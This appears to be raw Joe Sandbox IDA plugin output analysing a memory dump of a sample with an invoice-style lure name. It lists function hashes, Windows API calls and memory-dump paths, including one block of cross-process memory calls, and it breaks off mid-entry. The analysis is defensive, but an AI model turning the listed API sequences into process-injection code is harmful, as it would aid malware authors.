                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize
                                                          • String ID: .lnk
                                                          • API String ID: 948891078-24824748
                                                          • Opcode ID: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                          • Instruction ID: 605b303dec41d86b9006ad68fbc39a8b933418fd5c83e8205e1d6ead7464b05a
                                                          • Opcode Fuzzy Hash: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                          • Instruction Fuzzy Hash: 33A13B71104201AFD700EF64C881DAFB7ECEF98714F0489ADF59997192EB71EA49CB92
                                                          APIs
                                                            • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                          • CoInitialize.OLE32(00000000), ref: 00BAE85D
                                                          • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAE876
                                                          • CoUninitialize.OLE32 ref: 00BAE893
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
                                                          • Instruction ID: 27f840b06467b834a4ed610ce9cc94d578449f37745e0186c45d0119a1576d22
                                                          • Opcode Fuzzy Hash: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
                                                          • Instruction Fuzzy Hash: C6A135756083019FCB14DF24C88496EBBE5FF89310F148998F9AA9B3A1CB35ED45CB91
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00B832ED
                                                            • Part of subcall function 00B8E0D0: __87except.LIBCMT ref: 00B8E10B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                          • Instruction ID: 5cf99c26ed37eb2f885faa8c0252c0c59a239ea76f85c880b3c07e6fb9fa2f3c
                                                          • Opcode Fuzzy Hash: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                          • Instruction Fuzzy Hash: F4512771A0920296CB157B18C98537A2BD4EB40F10F248DE8F4E6832F9DF75CE98DB46
                                                          APIs
                                                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00BFDC50,?,0000000F,0000000C,00000016,00BFDC50,?), ref: 00BA4645
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00BA46C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper$__itow__swprintf
                                                          • String ID: REMOVE$THIS
                                                          • API String ID: 3797816924-776492005
                                                          • Opcode ID: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                          • Instruction ID: 91c2820fd1a05faec556464b97ece7f6ddaae91cb8d8faec1c278e5cf7ac119e
                                                          • Opcode Fuzzy Hash: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                          • Instruction Fuzzy Hash: 13418034A042499FCF01DF68C881AADB7F5FF8A304F1484A9E916AB392DBB4DD45CB50
                                                          APIs
                                                            • Part of subcall function 00BA430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC08,?,?,00000034,00000800,?,00000034), ref: 00BA4335
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B9C1D3
                                                            • Part of subcall function 00BA42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00BA4300
                                                            • Part of subcall function 00BA422F: GetWindowThreadProcessId.USER32(?,?), ref: 00BA425A
                                                            • Part of subcall function 00BA422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA426A
                                                            • Part of subcall function 00BA422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA4280
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C240
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C28D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                          • Instruction ID: 63dda4b4453b87aeb789a4ef7f6822df6e4fd7695930621335603170f0335e97
                                                          • Opcode Fuzzy Hash: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                          • Instruction Fuzzy Hash: BE411972900218AFDF11DBA4CD81AEEBBB8EB49700F0041A5FA45B7181DBB16E45CB61
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BFDC00,00000000,?,?,?,?), ref: 00BCA6D8
                                                          • GetWindowLongW.USER32 ref: 00BCA6F5
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BCA705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                          • Instruction ID: e4722e1e92a6b6fe4060715187a9aba9ad6a2bbc3219726c9f4036cb3e8273b9
                                                          • Opcode Fuzzy Hash: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                          • Instruction Fuzzy Hash: 2F316D31600209AFDB218E38CC85FEA77A9FB49768F244769F975A32E0D770EC519B50
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BCA15E
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BCA172
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCA196
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                          • Instruction ID: 7c3ac374a7f07fc920affc5436299835b13327122ec4cddcd1158add9673d138
                                                          • Opcode Fuzzy Hash: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                          • Instruction Fuzzy Hash: 9A21D132510218ABDF118F94CC82FEA3BB9EF49724F140258FE55BB1D0D6B5AC51CBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BCA941
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BCA94F
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BCA956
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                          • Instruction ID: e13db30b1f2da6675db0bae0c085a8e35a79db2a508798366b7ed0c1f33162f0
                                                          • Opcode Fuzzy Hash: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                          • Instruction Fuzzy Hash: A92183B5600209AFDB10DF54CCC6E6B37EDEB5A3A8B050199FA149B251CA70EC11CB61
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BC9A30
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BC9A40
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BC9A65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                          • Instruction ID: c2a3d0b45dbdd868ff259d6505b042141250d89d323729dafe7476fa1f93e11e
                                                          • Opcode Fuzzy Hash: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                          • Instruction Fuzzy Hash: CA219532610118BFEF258F54CC89FBF3BAAEF89760F018169F9545B190C6B19C5197A0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BCA46D
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BCA482
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BCA48F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                          • Instruction ID: d500929476714494aa52fc86e63ccc2254c4999b8a7ee8ab37889603acda7c65
                                                          • Opcode Fuzzy Hash: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                          • Instruction Fuzzy Hash: 2511E771200208BEEF245F65CC45FAB3BA9EF89768F01411CFA55A6191D6B1E811D720
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B82350,?), ref: 00B822A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B822A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 2574300362-340411864
                                                          • Opcode ID: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                          • Instruction ID: 43c88f65a4f4d692dbd9377b32f07bbbb3c10d5b6620ed89ce1856795dd85cd8
                                                          • Opcode Fuzzy Hash: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                          • Instruction Fuzzy Hash: F5E04F70AA0340ABDB206F71ED8DB5C36A4B705702F204069F202D64F1CBF48091CF04
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B82276), ref: 00B82376
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00B8237D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 2574300362-2819208100
                                                          • Opcode ID: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                          • Instruction ID: 6371cf483fbec48c4e10ca2ecfcdeb50c979456ea1e32941108fff869771a1f8
                                                          • Opcode Fuzzy Hash: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                          • Instruction Fuzzy Hash: 2BE0B670555340AFDB306F62ED4EB0C3AA4B705702F214465F20BE64B1CBF89421DB15
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                          • Instruction ID: 514b62092220b529de9b7eb957332bddb1717732a2d7f7f8e6b81323ee82ac29
                                                          • Opcode Fuzzy Hash: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                          • Instruction Fuzzy Hash: 75E012B1814618EBCB149750CD85DFAF3FCEB08751F1844D3BA0AA2210F6359BC4EB12
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B642EC,?,00B642AA,?), ref: 00B64304
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64316
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                          • Instruction ID: ffdae19753ea987498cae104ed57e7d09bc78b80e60bd10b8dc2029c72e2a6b6
                                                          • Opcode Fuzzy Hash: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                          • Instruction Fuzzy Hash: B9D0A934900B12AFC7204F20E84C7827AE8EF06312F00847EE882E3260EBF4C8C08B10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC21FB,?,00BC23EF), ref: 00BC2213
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00BC2225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetProcessId$kernel32.dll
                                                          • API String ID: 2574300362-399901964
                                                          • Opcode ID: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
                                                          • Instruction ID: 799c3ab109bf726e54e96c18f65690abaf8ee4435da08c44b21db51625a9c484
                                                          • Opcode Fuzzy Hash: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
                                                          • Instruction Fuzzy Hash: 59D0A7385007129FC7214F30F848B4176E5EF06712B00447DE841F7150DBB0D8C09750
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00B641BB,00B64341,?,00B6422F,?,00B641BB,?,?,?,?,00B639FE,?,00000001), ref: 00B64359
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B6436B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
                                                          • Instruction ID: d0d94883b5f95a11c68a5cdd14910419d3f48199ce42cc9be0bebec6a8479a6c
                                                          • Opcode Fuzzy Hash: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
                                                          • Instruction Fuzzy Hash: 43D05234900B12AEC7204B30A8486827AE8EB2171AB00847AE882E2250EBB4D8808A14
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00BA051D,?,00BA05FE), ref: 00BA0547
                                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00BA0559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                          • API String ID: 2574300362-1071820185
                                                          • Opcode ID: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
                                                          • Instruction ID: 4a95168cfd2f8f6977cf4bc926dabc2dbd51a0722830bed6e55bcf143d5efb4e
